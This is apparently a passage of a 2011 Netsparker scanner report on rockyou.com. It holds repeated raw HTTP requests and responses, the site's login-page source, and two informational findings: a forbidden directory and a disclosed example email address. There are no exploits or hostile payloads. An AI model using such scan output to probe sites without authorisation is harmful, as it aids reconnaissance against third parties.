ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Date: Mon, 18 Apr 2011 21:53:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:55 GMT; path=/; domain=.rockyou.com,lastlogin=1303163635; expires=Wed, 27-Jul-2011 21:53:55 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11297 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Forbidden Resource
Forbidden Resource
1
TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
|
- /events/include/
/events/include/ CONFIRMED |
Request
GET /events/include/ HTTP/1.1
Referer: http://www.rockyou.com/events/include/ajaxtrackevent.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=en; lastlogin=1303163632
Accept-Encoding: gzip, deflate
Referer: http://www.rockyou.com/events/include/ajaxtrackevent.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: lang=en; lastlogin=1303163632
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Date: Mon, 18 Apr 2011 21:53:53 GMT
Server: Apache/2.2
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /events/include/on this server.</p></body></html>
Date: Mon, 18 Apr 2011 21:53:53 GMT
Server: Apache/2.2
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /events/include/on this server.</p></body></html>
E-mail Address Disclosure
E-mail Address Disclosure
1
TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Remedy
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
|
- /login.php
/login.php |
Found E-mails
joe@somebody.com
Request
GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:55 GMT; path=/; domain=.rockyou.com,lastlogin=1303163635; expires=Wed, 27-Jul-2011 21:53:55 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:54 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11297 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option 